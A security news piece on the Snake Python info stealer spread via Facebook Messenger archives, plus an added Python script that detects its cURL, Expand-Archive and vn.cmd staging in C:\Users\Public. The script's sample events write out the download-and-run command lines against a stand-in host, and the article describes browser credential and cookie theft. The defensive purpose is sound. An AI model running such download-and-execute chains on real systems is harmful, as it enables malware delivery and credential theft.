Snake: Info Stealer - new malicious tool spreads via Facebook posts


Researchers warn that attackers are using Facebook posts to spread a Python-based information-stealing malware called Snake. Researchers at Cybereason have observed three different variants of the Python-based malware in use: two are plain Python scripts, while the third is an executable built with PyInstaller. Once the malware has harvested credentials from an infected system, it exfiltrates them through platforms such as Discord, GitHub and Telegram, abusing their APIs. The campaign has been active since at least August 2023, when a cybersecurity researcher reported it on the X platform.

Attackers send private Facebook Messenger messages to victims to trick them into downloading archive files such as RAR or ZIP. The archives contain two downloaders, a batch script and a cmd script, which deliver the corresponding Python-based malware variant to the victim's system as the final stage. "The archive file contains a BAT script that initiates the infection chain. The BAT script attempts to download a ZIP file using the cURL command and places it under the name myFile.zip in the C:\Users\Public directory. The BAT script then runs the PowerShell Expand-Archive cmdlet to extract the vn.cmd CMD script from the zip file and continues the infection," reads the report published by Cybereason.


"The CMD vn.cmd script is the main script responsible for downloading and executing the Python-based malware."
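As an added example that is not part of the original article or the Cybereason report, the following Python script turns the infection chain described above (a cURL download into C:\Users\Public, a PowerShell Expand-Archive extraction from that directory, then execution of a .cmd script from the same place) into an ordered, time-windowed detection over process-creation events. The event field names and the sample command lines are constructed assumptions, not real telemetry.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (assumed schema, not real telemetry).
# WS01 shows the full chain from the article; WS02 is a benign curl download.
SAMPLE_EVENTS = [
    {"host": "WS01", "ts": 1, "image": "curl.exe",
     "cmdline": r"curl.exe -o C:\Users\Public\myFile.zip https://example.invalid/a"},
    {"host": "WS01", "ts": 2, "image": "powershell.exe",
     "cmdline": r"powershell -c Expand-Archive -Path C:\Users\Public\myFile.zip "
                r"-DestinationPath C:\Users\Public"},
    {"host": "WS01", "ts": 3, "image": "cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\Public\vn.cmd"},
    {"host": "WS02", "ts": 1, "image": "curl.exe",
     "cmdline": r"curl.exe -O https://example.invalid/report.pdf"},
]

# One regex per stage; the stages must appear in this order on the same host.
# The patterns key on the world-writable C:\Users\Public staging directory rather
# than on the file name myFile.zip, so renamed payloads are still caught.
STAGES = [
    ("curl_to_public", re.compile(r"\bcurl(\.exe)?\b.*C:\\Users\\Public\\", re.I)),
    ("expand_archive_public", re.compile(r"Expand-Archive\b.*C:\\Users\\Public\\", re.I)),
    ("cmd_from_public", re.compile(r"C:\\Users\\Public\\[^ ]+\.cmd\b", re.I)),
]


def stage_of(event):
    """Return the stage name an event's command line matches, or None."""
    for name, pattern in STAGES:
        if pattern.search(event["cmdline"]):
            return name
    return None


def detect_chain(events, window=300):
    """Return hosts on which all stages occurred in order within `window` seconds."""
    per_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = stage_of(ev)
        if stage:
            per_host[ev["host"]].append((ev["ts"], stage))
    order = [name for name, _ in STAGES]
    hits = []
    for host, seen in per_host.items():
        idx, start = 0, None
        for ts, stage in seen:
            if start is not None and ts - start > window:
                idx, start = 0, None  # partial sequence went stale; start over
            if stage == order[idx]:
                start = ts if idx == 0 else start
                idx += 1
                if idx == len(order):
                    hits.append(host)
                    break
    return hits
```

Running `detect_chain(SAMPLE_EVENTS)` flags only WS01; a lone curl download, as on WS02, is not enough to alert, which keeps the false-positive rate of the individual stages from dominating.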

The malware can collect sensitive data from various web browsers, including Brave, Coc Coc Browser, Chromium, Google Chrome, Microsoft Edge, Mozilla Firefox and Opera. It is worth noting that Coc Coc Browser is widely used in the Vietnamese community; its inclusion suggests that the campaign was, at some point, specifically aimed at Vietnamese users. Researchers also found that the malware collects Facebook-related cookies. "In addition to cookies and credential confirmation information, project.py stores information about Facebook-related cookies in a cookiefb.txt file. This is likely done by attackers to take over the victim's Facebook account and possibly spread the infection further," the report said. Researchers attribute the campaign to Vietnamese speakers based on several indicators, including comments in the scripts, file naming conventions and the presence of Coc Coc Browser in the list of targeted browsers. The report also maps the campaign to the MITRE ATT&CK framework.
